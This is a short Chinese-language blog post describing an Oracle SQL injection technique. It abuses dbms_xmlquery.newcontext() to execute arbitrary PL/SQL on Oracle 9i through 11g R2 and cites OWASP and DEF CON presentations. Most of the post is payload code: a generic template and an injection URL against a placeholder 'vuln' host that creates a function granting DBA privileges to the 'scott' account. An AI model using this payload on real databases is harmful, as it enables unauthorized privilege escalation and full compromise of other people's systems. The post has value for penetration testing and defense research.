Oracle注入使用dbms_xmlquery.newcontext()执行任意PL/SQL语句

作者: RedFree 分类: Oracle 发布时间: 2018-09-11 14:35 ė1,795 次访问 6没有评论

函数:

dbms_xmlquery.newcontext()

dbms_xmlquery.getxml()

适用版本:Oracle 9i to 11g R2

1536648050650848.png

示例:

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''any pl/sql statement ''; commit; end;') from dual

实例:

http://vuln/index.php?id=1 and
(select dbms_xmlquery.newcontext(‘
declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace function pwn return varchar2 authid current_user is PRAGMA autonomous_transaction;BEGIN execute immediate ''''grant dba to scott'''';commit;return ''''z'''';END; ''; commit; end;‘) from dual) is not null --

资料来源:

ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf

https://www.owasp.org/images/6/68/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf

https://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sumit_siddharth-sql_injection_worm.pdf

本文出自 RedFree's Blog,转载时请注明出处及相应链接。

本文永久链接: http://py4.me/blog/?p=590

0

发表评论

电子邮件地址不会被公开。

Ɣ回顶部